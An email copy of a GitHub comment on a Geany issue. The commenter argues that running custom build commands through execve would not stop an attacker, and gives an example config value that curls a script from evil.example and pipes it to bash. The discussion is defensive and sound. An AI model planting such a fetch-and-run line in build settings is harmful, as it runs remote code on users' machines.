dolik-rce left a comment (geany/geany#4610)

Pardon my ignorance, but I don't understand how the recommended fix would help? 
Executing commands is what the "custom build commands" feature does. If it is 
implemented with `execve` the attacker still has the same opportunity to run 
anything, including `/bin/sh`.  They would just use `NF_00_CM=sh -c 'make; curl 
http://evil.example/payload.sh | bash'` instead (or hide the evil curl call in 
the makefile).

I think that there is no way to implement this "safely", it is just as if you 
download shellscript, Makefile, Gradle project or literally anything that is 
*intended* to run commands - the user should always carefully inspect those 
before running them.

Aside from that, running multiple chained commands is a feature that I 
personally use in some projects. 

-- 
Reply to this email directly or view it on GitHub:
https://github.com/geany/geany/issues/4610#issuecomment-4829000152
You are receiving this because you are subscribed to this thread.

Message ID: <geany/geany/issues/4610/[email protected]>

Reply via email to